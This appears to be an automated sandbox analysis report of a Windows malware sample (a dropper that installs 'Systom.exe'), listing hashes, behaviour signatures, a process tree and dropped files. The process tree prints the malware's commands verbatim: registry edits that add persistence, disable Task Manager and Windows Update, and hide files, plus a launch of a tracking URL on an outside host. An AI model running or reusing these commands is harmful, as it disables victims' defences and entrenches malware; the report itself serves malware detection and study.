Analysis

  • max time kernel
    145s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/09/2024, 04:14

General

  • Target

    ea90986ca1ccc0e9e15c76011923b03d_JaffaCakes118.exe

  • Size

    56KB

  • MD5

    ea90986ca1ccc0e9e15c76011923b03d

  • SHA1

    afd26f693018bd7ae7c1d9c84858c5077a868c33

  • SHA256

    8d70f29c3c5dc0f9f11a171560aee956e7b588c9272511ca78aa712923681336

  • SHA512

    2ac1020bffff0cbff7c6d9e2b4a4f2f81101855dc020f532ba767ef53ef52ee2a04694e8bb0f0efbff87afce2fa4407a4c73bca0ed1c7910a72fddab2f508f54

  • SSDEEP

    768:cS1q1Q4RDU7wuFHfhXkoYqbvda7k9rhSV1YDrou9e0emRkc+y4IX9EPvmtK:71q1Q4qLf1nhrrou9e0eS94qtK

Malware Config

Signatures

  • Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 21 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops autorun.inf file 1 TTPs 8 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 6 IoCs
  • Drops file in Program Files directory 6 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 49 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ea90986ca1ccc0e9e15c76011923b03d_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ea90986ca1ccc0e9e15c76011923b03d_JaffaCakes118.exe"
    1⤵
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4728
    • C:\Windows\SysWOW64\Systom.exe
      C:\Windows\system32\Systom.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Enumerates connected drives
      • Drops autorun.inf file
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3592
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V crsss /T REG_SZ /D C:\Windows\system32\Systom.exe /F
        3⤵
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Modifies registry key
        PID:4652
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1620
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_dword /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2460
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced" /v Hidden /t reg_dWord /d 00000000 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2624
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 00000001 /f
        3⤵
        • Modifies visibility of file extensions in Explorer
        • System Location Discovery: System Language Discovery
        PID:448
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 00000000 /f
        3⤵
        • Modifies visiblity of hidden/system files in Explorer
        • System Location Discovery: System Language Discovery
        PID:4404
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_SZ /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2552
      • C:\Windows\SysWOW64\reg.exe
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /v CheckedValue /t REG_dword /d 00000002 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2424
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://xx.522love.cn/tongji/tj.asp
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4264
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4264 CREDAT:17410 /prefetch:2
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:216
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:4244
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4016
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:2596
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1984
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:3568
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3448
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:648
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1376
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:4700
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3928
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:4904
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2456
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:3460
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3712
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:4868
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3424
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:4016
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:768
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:4240
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2368
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:1084
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2772
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:4924
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2804
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:3828
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4440
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:2624
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4556
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:3736
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2580
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:2668
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1976
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • Modifies Internet Explorer settings
        PID:3080
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4756
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:4020
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:660
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:3848
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2744
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:3444
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4364
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • Modifies Internet Explorer settings
        PID:1376
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:600
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:4560
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4720
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:1976
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4876
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:1900
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2012
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:1452
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1620
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:2712
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2228
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        PID:1656
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f
        3⤵
          PID:3200
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\ea90986ca1ccc0e9e15c76011923b03d_JaffaCakes118.bat
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2452
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ea90986ca1ccc0e9e15c76011923b03d_JaffaCakes118.bat""
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1460

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\ea90986ca1ccc0e9e15c76011923b03d_JaffaCakes118.bat

      Filesize

      212B

      MD5

      85ed54dfb35efa31b1f3c482eb2aed9e

      SHA1

      0fd85799f94dc301cb9171833abe25a14a72e838

      SHA256

      bfb3f795b142a16f9879c75900682a5c87363e0386623ad691fb216806517a87

      SHA512

      6e94ae13b5fbf32607f9b7a9d3903d24243122ca0579e1f951ed11d51e8af338a4ee07d0e719aca34dc858e937b62c98a0fa368e50e226a89f3b63d5f5cb184a

    • C:\Windows\SysWOW64\Systom.exe

      Filesize

      56KB

      MD5

      ea90986ca1ccc0e9e15c76011923b03d

      SHA1

      afd26f693018bd7ae7c1d9c84858c5077a868c33

      SHA256

      8d70f29c3c5dc0f9f11a171560aee956e7b588c9272511ca78aa712923681336

      SHA512

      2ac1020bffff0cbff7c6d9e2b4a4f2f81101855dc020f532ba767ef53ef52ee2a04694e8bb0f0efbff87afce2fa4407a4c73bca0ed1c7910a72fddab2f508f54

    • C:\auToRun.inf

      Filesize

      159B

      MD5

      52a91a3dc7dd66febd48249e964bdf68

      SHA1

      563fc702c1a46cccb33f75e954d7175cfb6b0729

      SHA256

      accf8344413f2fd07111e6c29969ace60f8b7d06049216f677730e62e68b0b2e

      SHA512

      0cf51ce1fbf9b234b3d5aac11d024c1954b1de2874bf47026491ad0e4c9d0a0307483a88c833fd20d7fdb23ed620301c55fadd66a0cbaf32f55558eba07d660b

    • memory/3592-109-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-155-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-67-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-72-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-86-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-327-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-132-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-41-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-178-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-212-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-235-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-258-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-281-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/3592-304-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB

    • memory/4728-7-0x0000000000400000-0x0000000000413000-memory.dmp

      Filesize

      76KB